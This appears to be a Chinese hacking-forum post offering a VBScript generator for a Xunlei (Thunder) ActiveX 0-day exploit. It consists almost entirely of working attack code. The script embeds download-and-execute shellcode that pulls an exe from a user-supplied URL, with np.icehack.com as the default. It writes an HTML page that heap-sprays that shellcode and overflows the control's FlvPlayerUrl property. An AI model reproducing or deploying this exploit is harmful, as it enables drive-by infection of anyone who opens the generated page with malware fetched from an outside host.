vbs也写EXP]xunlei_0day_exp

 
来源：vbs空间

exeurl = InputBox( "请输入下载执行exe的地址：", "输入","http://np.icehack.com/np.exe" )
'code by NetPatch
if exeurl <> "" then
code="/x43/x43/x43/x43/x43/x43/xe9/xa3/x00/x00/x00/x5f/x64/xa1/x30/x00/x00/x00/x8b/x40/x0c/x8b/x70/x1c/xad/x8b/x68/x08/x8b/xf7/x6a/x04/x59/xe8/x43/x00/x00/x00/xe2/xf9/x68/x6f/x6e/x00/x00/x68/x75/x72/x6c/x6d/x54/xff/x16/x95/xe8/x2e/x00/x00/x00/x83/xec/x20/x8b/xdc/x6a/x20/x53/xff/x56/x04/xc7/x04/x03/x5c/x61/x2e/x65/xc7/x44/x03/x04/x78/x65/x00/x00/x33/xc0/x50/x50/x53/x57/x50/xff/x56/x10/x8b/xdc/x50/x53/xff/x56/x08/xff/x56/x0c/x51/x56/x8b/x75/x3c/x8b/x74/x2e/x78/x03/xf5/x56/x8b/x76/x20/x03/xf5/x33/xc9/x49/x41/xad/x03/xc5/x33/xdb/x0f/xbe/x10/x3a/xd6/x74/x08/xc1/xcb/x0d/x03/xda/x40/xeb/xf1/x3b/x1f/x75/xe7/x5e/x8b/x5e/x24/x03/xdd/x66/x8b/x0c/x4b/x8b/x5e/x1c/x03/xdd/x8b/x04/x8b/x03/xc5/xab/x5e/x59/xc3/xe8/x58/xff/xff/xff/x8e/x4e/x0e/xec/xc1/x79/xe5/xb8/x98/xfe/x8a/x0e/xef/xce/xe0/x60/x36/x1a/x2f/x70"
down=exeurl&Chr(00)
Function Unicode(str1)
 Dim str,temp
 str = ""
 For i=1 to len(str1)
 temp = Hex(AscW(Mid(str1,i,1)))
 If len(temp) < 5 Then temp = right("0000"&temp, 2)
 str = str & "/x" & temp
 Next
 Unicode = str
End Function
function replaceregex(str)
set regex=new regExp
regex.pattern="//x(..)//x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function
set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("netpatch.htm",8,true)

fileS.writeline "<SCRIPT language=""JavaScript"">"
fileS.writeline "var expires = new Date();"
fileS.writeline "expires.setTime(expires.getTime() + 0 * 0 * 1 * 1000);"
fileS.writeline "var set_cookie = document.cookie.indexOf(""say_hello=""); "
fileS.writeline "if (set_cookie == -1){document.cookie = ""say_hello=1;expires="" + expires.toGMTString();"
fileS.writeline "document.write('<object id=""gl"" classid=""clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F""></object>');"
fileS.writeline "var helloworld2Address = 0x0c0c0c0c;"
fileS.writeline "var shellcode = unescape("""&replaceregex(code&Unicode(down))&""");"
fileS.writeline "var hbshelloworld = 0x100000;"
fileS.writeline "var payLoadSize = shellcode.length * 2;"
fileS.writeline "var spraySlideSize = hbshelloworld - (payLoadSize+0x38);"
fileS.writeline "var spraySlide = unescape(""%u0c0c%u0c0c"");"
fileS.writeline "spraySlide = getSpraySlide(spraySlide,spraySlideSize);"
fileS.writeline "heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;"
fileS.writeline "memory = new Array();"
fileS.writeline "for (i=0;i<heapBlocks;i++)"
fileS.writeline "{"
fileS.writeline " memory[i] = spraySlide + shellcode;"
fileS.writeline "}"
fileS.writeline "function getSpraySlide(spraySlide, spraySlideSize)"
fileS.writeline "{"
fileS.writeline "while (spraySlide.length*2<spraySlideSize)"
fileS.writeline "{"
fileS.writeline " spraySlide += spraySlide;"
fileS.writeline "}"
fileS.writeline "spraySlide = spraySlide.substring(0,spraySlideSize/2);"
fileS.writeline "return spraySlide;"
fileS.writeline "}"
fileS.writeline "var size_buff = 1070;"
fileS.writeline "var x = unescape(""%0c%0c%0c%0c"");"
fileS.writeline "while (x.length<size_buff) x += x;"
fileS.writeline "gl.FlvPlayerUrl = x;"
fileS.writeline "}"
fileS.writeline "</SCRIPT>"
fileS.writeline "<script>"
fileS.writeline "if (set_cookie == -1){"
fileS.writeline "location.reload();"
fileS.writeline "}"
fileS.writeline "</script>"files.Close
Set fso=nothing
msgbox "生成完毕!"
end if